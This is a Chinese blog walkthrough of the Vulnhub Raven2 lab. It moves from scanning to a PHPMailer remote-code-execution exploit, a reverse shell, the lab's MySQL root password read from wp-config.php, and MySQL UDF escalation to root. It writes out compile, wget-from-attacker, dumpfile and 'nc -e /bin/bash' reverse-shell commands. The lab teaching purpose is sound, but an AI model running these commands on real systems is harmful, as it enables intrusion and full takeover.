Vulnhub - Raven2

2024-03-19 15:28
文章标签 vulnhub raven2

本文主要是介绍Vulnhub - Raven2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

Raven2 靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/

0x01 信息收集

Nmap扫描目标主机,发现开放22、80、111、50511端口,分别运行ssh、http、rpc服务。

┌──(root㉿ch4ser)-[~]
└─# nmap -p- -sV -sC -A 192.168.196.142
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-18 06:07 CST
Nmap scan report for 192.168.196.142
Host is up (0.00040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          46327/tcp6  status
|   100024  1          50447/udp   status
|   100024  1          50511/tcp   status
|_  100024  1          55930/udp6  status
50511/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:6D:02:A6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问80端口网站页面如下                                                        

尝试DirSearch扫描80端口网站目录,发现多个敏感目录及页面信息

访问/vendor页面如下

通过README.md得知该站点部署有PHPMailer,PHPMailer是一个用于发送电子邮件的PHP库,许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件。

通过VERSION得知PHPMailer的版本为5.2.16

通过PATH得知网站根目录为/var/www/html

通过SECURITY.md得知PHPMailer 5.2.18之前的版本存在RCE(CVE-2016-18833)

网上搜索相关资料得知该漏洞成因为PHPMailer未对用户输入的邮件地址、内容进行过滤,将相关变量直接拼接到命令执行函数所造成

 前面DirSearch扫到的/contact.php就是该站点发送邮件的地址

除了以上信息,DirSearch还扫到/wordpress,访问发现是一个WordPress站点。

0x02 权限获取 - PHPMailer

尝试使用wpscan扫描WordPress站点,发现使用插件Akismet(反垃圾评论插件),版本为3.3.2

searchsploit搜索Akismet相关利用,发现并不适用于当前版本,在网上也没有找到对应版本的漏洞利用文章

┌──(root㉿ch4ser)-[~]
└─# wpscan --url http://192.168.196.142/wordpress/ --plugins-detection aggressive[i] Plugin(s) Identified:[+] akismet| Location: http://192.168.196.142/wordpress/wp-content/plugins/akismet/| Last Updated: 2024-01-17T22:32:00.000Z| Readme: http://192.168.196.142/wordpress/wp-content/plugins/akismet/readme.txt| [!] The version is out of date, the latest version is 5.3.1|| Found By: Known Locations (Aggressive Detection)|  - http://192.168.196.142/wordpress/wp-content/plugins/akismet/, status: 200|| Version: 3.3.2 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - http://192.168.196.142/wordpress/wp-content/plugins/akismet/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)|  - http://192.168.196.142/wordpress/wp-content/plugins/akismet/readme.txt──(root㉿ch4ser)-[~]
└─# searchsploit akismet                                                         
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities                                                                                                         | php/webapps/37902.php
WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting                                                                                                                            | php/webapps/30036.html
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------

尝试DirSearch重新扫描该WordPress站点,发现多个敏感目录及文件,但是大多都没有权限查看,如网站配置文件/wordpress/wp-config.php 

考虑换个思路,从PHPMailer下手。searchsploit搜索PHPMailer相关利用,选择使用40974.py(因为这个老哥写的用法要清晰些)

┌──(root㉿ch4ser)-[~]
└─# searchsploit PHPMailer
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service                                                                                                                                | php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution                                                                                                                                       | php/webapps/40968.sh
PHPMailer < 5.2.18 - Remote Code Execution                                                                                                                                       | php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution                                                                                                                                       | php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)                                                                                                                    | multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution                                                                                                                                       | php/webapps/40969.py
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution                                                   | php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                                                                                                         | php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure                                                                                                                                       | php/webapps/43056.py
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)                                                                                                      | php/remote/42024.rb
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(root㉿ch4ser)-[~]
└─# find / -name 40974.py
/root/40974.py
/usr/share/exploitdb/exploits/php/webapps/40974.py┌──(root㉿ch4ser)-[~]
└─# cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./ 

根据已知信息,修改站点发送邮件的地址;修改反弹shell的IP和port;修改网站路径、后门地址

具体如下:

执行exp后有如下显示则表示后门已成功写入 

Kali开启nc监听4444端口,访问/shell.php,成功收到会话,权限为www-data

进入wordpress目录,查看之前的网站配置文件wp-config.php,发现MySQL数据库root账户密码

┌──(root㉿ch4ser)-[~]
└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.196.142: inverse host lookup failed: Unknown host
connect to [192.168.196.128] from (UNKNOWN) [192.168.196.142] 51557
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/var/www/html$ ls
Security - Doc	contact.zip    fonts	   js		 shell.php  wordpress
about.html	css	       img	   scss		 team.html
contact.php	elements.html  index.html  service.html  vendor
www-data@Raven:/var/www/html$ cd wordpress; cat wp-config.php
............
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');/** MySQL database username */
define('DB_USER', 'root');/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');/** MySQL hostname */
define('DB_HOST', 'localhost');/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

0x03 权限提升 - UDF

由于拿到了MySQL的root账户密码,所以尝试进行UDF提权,首先需要连上数据库,探测一下当前环境是否符合UDF提权条件。

得知当前MySQL版本为5.5.6>5.2,secure_file_priv为空代表可以写入,插件路径为/usr/lib/mysql/plugin/,综上所述,符合UDF提权条件。

www-data@Raven:/var/www/html/wordpress$ mysql -uroot -pR@v3nSecuritymysql> select version();
select version();
+-----------------+
| version()       |
+-----------------+
| 5.5.60-0+deb8u1 |
+-----------------+
1 row in set (0.00 sec)mysql> show variables like '%secure%';
show variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.00 sec)mysql> show variables like '%plugin%';
show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)

UDF提权一般分为手工和工具梭哈两种,如果选择使用MDUT之类的工具梭哈,那么需要解决MySQL默认禁止root外联的问题,可以执行以下SQL语句解决:

GRANT ALL PRIVILEGES ON *.* TO '帐号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;
flush privileges;

这里我演示手工提权,searchsploit搜索udf提权exp,gcc编译为udf.so(类似windows的dll动态链接库文件),将其放到Kali的网站根目录下,以便目标主机wget下载。

┌──(root㉿ch4ser)-[~]
└─# searchsploit mysql udf
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)                                                                                                           | linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)                                                                                                          | linux/local/1518.c
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution                                                                                                                | windows/remote/3274.txt
MySQL 4/5/6 - UDF for Command Execution                                                                                                                                          | linux/local/7856.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(root㉿ch4ser)-[~]
└─# find / -name 1518.c  
/root/1518.c
/usr/share/exploitdb/exploits/linux/local/1518.c┌──(root㉿ch4ser)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/1518.c ./  ┌──(root㉿ch4ser)-[~]
└─# gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc┌──(root㉿ch4ser)-[~]
└─# mv udf.so /var/www/html/

目标主机会话这边切换到/tmp目录再wget下载udf.so

www-data@Raven:/var/www/html$ cd /tmp
www-data@Raven:/tmp$ wget 192.168.196.128/udf.so
www-data@Raven:/tmp$ ls
udf.so

来到mysql数据库,创建ch4ser表

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> create table ch4ser(line blob);
create table ch4ser(line blob);
Query OK, 0 rows affected (0.00 sec)

ch4ser表中插入二进制的/tmp/udf.so,其中line为任意列名,blob为二进制大对象格式

mysql> insert into ch4ser values(load_file('/tmp/udf.so'));
insert into ch4ser values(load_file('/tmp/udf.so'));
Query OK, 1 row affected (0.00 sec)

导出/tmp/udf.so到/usr/lib/mysql/plugin/目录下

为什么不直接将udf.so直接下载到插件目录/usr/lib/mysql/plugin/是因为当前权限是www-data,大概率是不够的,这里是通过MySQL的root用户权限将/tmp/udf.so导出到了/usr/lib/mysql/plugin/目录

mysql> select * from ch4ser into dumpfile '/usr/lib/mysql/plugin/udf.so';
select * from ch4ser into dumpfile '/usr/lib/mysql/plugin/udf.so';
Query OK, 1 row affected (0.00 sec)

创建do_system自定义函数(函数名任意),执行bash反弹命令,Kali这边nc监听6666端口。

mysql> create function do_system returns integer soname 'udf.so';
create function do_system returns integer soname 'udf.so';
Query OK, 0 rows affected (0.00 sec)mysql> select do_system('nc 192.168.196.128 6666 -e /bin/bash');

成功收到会话,拿到root权限和flag

┌──(root㉿ch4ser)-[~]
└─# nc -lvvp 6666                      
listening on [any] 6666 ...
192.168.196.142: inverse host lookup failed: Unknown host
connect to [192.168.196.128] from (UNKNOWN) [192.168.196.142] 59541
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
flag4.txt
cat flag4.txt___                   ___ ___ | _ \__ ___ _____ _ _ |_ _|_ _||   / _` \ V / -_) ' \ | | | | |_|_\__,_|\_/\___|_||_|___|___|flag4{df2bc5e951d91581467bb9a2a8ff4425}CONGRATULATIONS on successfully rooting RavenIII hope you enjoyed this second interation of the Raven VMHit me up on Twitter and let me know what you thought: @mccannwj / wjmccann.github.io

这篇关于Vulnhub - Raven2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/826437

相关文章

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC7

文章目录 DC-7环境搭建渗透测试 DC-7 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC4

文章目录 DC-4环境搭建渗透测试 DC-4 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC-3

文章目录 DC-3环境搭建渗透测试 DC-3 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-32,312/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~

Vulnhub--OS-HACKNOS-2.1

渗透复现 目标站点为wordpress,通过wpscan进行漏洞扫描发现漏洞插件 通过漏洞插件存在的目录穿越漏洞成功读取/etc/passwd文件中flag用户的密码 SSH登录flag用户后在备份文件中找到rohit用户的密码 切换rohit用户,rohit用户能够以root权限执行任何文件,随后进行sudo su提权 知识扩展 wpsacn扫描wordpress站点 以root权

[Vulnhub] Sleepy JDWP+Tomcat+Reverse+Reverse-enginnering

信息收集 Server IP AddressPorts Opening192.168.8.100TCP:21,8009,9001 $ nmap -sV -sC 192.168.8.100 -p- --min-rate 1000 -Pn Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-20 05:06 EDTNmap scan repor

[Vulnhub] BrainPan BOF缓冲区溢出+Man权限提升

信息收集 Server IP AddressPorts Open192.168.8.105TCP: $ nmap -p- 192.168.8.105 -sC -sV -Pn --min-rate 1000 Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-10 04:20 EDTNmap scan report for 192.168.8

vulnhub靶机hacksudoLPE中Challenge-1

下载地址:https://download.vulnhub.com/hacksudo/hacksudoLPE.zip 主机发现 目标146 端口扫描 服务扫描 漏洞扫描 上面那整出来几个洞,可以试试 easy? 估计就是看源码 看来是的 登入咯 这里进不去就是ssh咯 这个看着有点像提权的操作 一、Challenge-1 1.